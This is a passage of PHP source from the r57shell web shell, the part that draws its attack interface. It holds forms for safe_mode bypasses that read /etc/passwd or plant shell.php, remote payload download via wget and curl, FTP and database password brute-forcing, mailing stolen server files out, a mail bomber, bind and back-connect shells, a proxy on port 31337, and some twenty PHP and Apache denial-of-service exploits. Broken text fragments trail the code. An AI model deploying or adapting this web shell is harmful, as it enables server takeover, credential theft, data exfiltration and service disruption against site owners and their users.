   echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
   echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
   echo sr(15,"".$lang[$language.'_text117'].$arrow."",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
   echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
   echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){ 
   echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
   echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
   echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
   echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0) 
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
   echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0) 
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
   echo sr(15,"".$lang[$language.'_text116'].$arrow."",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
   echo sr(15,"".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
   echo sr(15,"".$lang[$language.'_text125'].$arrow."",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):(""))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0) 
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
   echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
   echo sr(15,"".$lang[$language.'_text125'].$arrow."",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):(""))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
   echo sr(15,"".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
   echo sr(15,"".$lang[$language.'_text125'].$arrow."",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):(""))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0) 
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
   echo sr(15,"".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
   {                                                                               
   echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
   echo "
";                                                             echo $te.''.$table_end1;                                                  
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
   {                                                                               
   echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
   echo "
";                                                             echo $te.''.$table_end1;                                                  
   }                                                                               
                                                                                   
                                                                                   
   if((!@function_exists('ini_get')) || @ini_get('file_uploads')){                 
   echo "
";              
   echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile0',85,''));
   echo sr(15,"".$lang[$language.'_text21'].$arrow."",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
                                                                                   
   if((!@function_exists('ini_get')) || @ini_get('file_uploads')){                 
   echo "";              
   echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
   echo "
";                                                             echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
                                                                                   
   $select='';                                                                     
   if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('fopen'))){$select = "";}
   if(!$safe_mode){                                                                
    if(which('wget')){$select .= "";}          
    if(which('fetch')){$select .= "";}       
    if(which('lynx')){$select .= "";}          
    if(which('links')){$select .= "";}       
    if(which('curl')){$select .= "";}          
    if(which('GET')){$select .= "";}             
   }                                                                               
   if($select){                                                                    
    echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
    echo sr(15,"".$lang[$language.'_text16'].$arrow."","".in('hidden','dir',0,$dir).ws(2)."".$lang[$language.'_text17'].$arrow."".in('text','rem_file',78,'http://'));
    echo sr(15,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
    echo $te.''.$table_end1.$fe;                                             
   }                                                                               
                                                                                   
   echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
   echo sr(15,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
   $arh = $lang[$language.'_text92'];                                              
   if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
   if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
   if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
   echo sr(15,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh);
   echo $te.''.$table_end1.$fe;                                              
                                                                                   
   if(@function_exists("ftp_connect")){                                            
   echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."
".$fs."".$fe.$fs."".$fe.$fs."".$fe."























































































































".$ts;                                       
   echo sr(20,"".$lang[$language.'_text30'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
   echo $te." ".$ts;                                  
   echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
   echo $te."






".$ts;                                       
   echo sr(20,"".$lang[$language.'_text4'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
   echo $te." ".$ts;                                  
   echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
   echo $te."
















".$ts;                                       
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile1',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile2',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile3',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile4',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile5',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile6',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile7',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile8',35,''));
   echo $te." ".$ts;                                  
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile9',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile10',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile11',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile12',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile13',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile14',35,''));
   echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile15',35,''));
   echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
   echo $te."































".$ts;
                                                                                   
   echo "".$lang[$language.'_text94']."";
   echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
   echo sr(25,"",in('radio','brute_method',0,'passwd',1)."".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )");
   echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
   echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
   echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
   echo sr(25,"".$lang[$language.'_text135'].$arrow."",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
   echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));               
                                                                                   
   echo $te." ".$ts;                       
   echo "".$lang[$language.'_text87']."";
   echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
   echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
   echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
   echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
   echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir));
   echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir));
   echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));              
                                                                                   
   echo $te." ".$ts;                       
   echo "".$lang[$language.'_text100']."";
   echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
   echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
   echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
   echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir));
   echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
   echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir));
   echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));               
                                                                                   
   echo $te."
";                                     
   }                                                                               
                                                                                   
                                                                                   
   if(@function_exists("mail")){                                                   
   echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."".$fs."".$ts;
   echo "".$lang[$language.'_text103']."";
   echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
   echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
   echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
   echo sr(25,"".$lang[$language.'_text108'].$arrow."",''.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'');
   echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));              
                                                                                   
   echo $te."".$fe.$fs."".$ts;                       
   echo "".$lang[$language.'_text104']."";
   echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("vito.eshop@gmail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
   echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("vito.eshop@gmail.com"))));
   echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
   echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',30,$dir));
   echo sr(25,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none',1).' '.$arh);
   echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));              
                                                                                   
   echo $te."".$fe.$fs."".$ts;                       
   echo "".$lang[$language.'_text139']."";
   echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
   echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
   echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
   echo sr(25,"".$lang[$language.'_text108'].$arrow."",''.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'');
   echo sr(25,"Flood".$arrow."",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."Size(kb)".$arrow."".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
   echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));              
                                                                                   
   echo $te."".$fe."";                                     
   }                                                                               
                                                                                   
                                                                                   
   if($mysql_on||$mssql_on||$pg_on||$ora_on)                                       
   {                                                                               
   $select = '';                                                         
                                                                                   
   echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."".$fs."".$ts;
   echo "".$lang[$language.'_text134']."";
                                                                                   
   echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
   echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
   echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
   echo sr(25,"",in('radio','brute_method',0,'passwd',1)."".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )");
   echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
   echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
   echo sr(35,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
   echo sr(25,"".$lang[$language.'_text135'].$arrow."",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
   echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));               
                                                                                   
   echo $te."".$fe.$fs."".$ts;                       
   echo "".$lang[$language.'_text83']."";
                                                                                   
   echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select);             
   echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
   echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
   echo sr(35,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' . '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
   echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."".$lang[$language.'_text41'].$arrow."",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
   echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));               
                                                                                   
   echo $te."".$fe.$fs."".$ts;                       
   echo "".$lang[$language.'_text83']."";
                                                                                   
   echo sr(35,"".$lang[$language.'_text80'].$arrow."",$select);             
   echo sr(35,"".$lang[$language.'_text111'].$arrow."",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' : '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
   echo sr(35,"".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' : '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
   echo sr(35,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
   echo sr(35,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
   echo $te."".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."
".in('submit','submit',0,$lang[$language.'_butt1'])."
";
                                                                                   
   echo "".$fe."";                                         
   }                                                                               
                                                                                   
                                                                                   
                                                                                   
   if(!$safe_mode && $unix){                                                       
   echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."".$fs."".$ts;
   echo "".$lang[$language.'_text9']."";
   echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',10,'11457'));
   echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',10,'r57'));
   echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir));
   echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));               
   echo $te."".$fe.$fs."".$ts;                       
   echo "".$lang[$language.'_text12']."";
   echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
   echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'11457'));
   echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir));
   echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));               
   echo $te."".$fe.$fs."".$ts;                       
   echo "".$lang[$language.'_text22']."";
   echo sr(40,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',10,'11457'));
   echo sr(40,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',10,'irc.dalnet.ru'));
   echo sr(40,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',10,'6667'));
   echo sr(40,"".$lang[$language.'_text26'].$arrow."","".in('hidden','dir',0,$dir));
   echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));               
   echo $te."".$fe.$fs."".$ts;                       
   echo "Proxy";
   echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','proxy_port',10,'31337'));
   echo sr(40,"".$lang[$language.'_text26'].$arrow."","".in('hidden','dir',0,$dir));
   echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));               
   echo $te."".$fe."";                                     
   }                                                                               
                                                                                   
   echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."".$ts;
   echo "".$lang[$language.'_text141']."";
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
   echo $te."".$ts;                                  
   echo "".$lang[$language.'_text141']."";
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
   echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
   echo $te."";                                            
                                                                                   
   echo ''.$table_up3."o---[ r57shell | version ".$version." | vito-keren.info | vito-keren.info | Vito RawckerheaD | Generation time: ".round(getmicrotime()-starttime,4)." ]---o
";
   echo '';                                                          
    ?>                                                                             
    
   --xYzZY--

Directive	Local Value	Master Value
'.ws(3).''.$key.'	'.U_value($value['local_value']).'	'.U_value($value['global_value']).'

'.ws(3).''.trim($info[0]).'	'.trim($info[1]).'
'.ws(3).' ---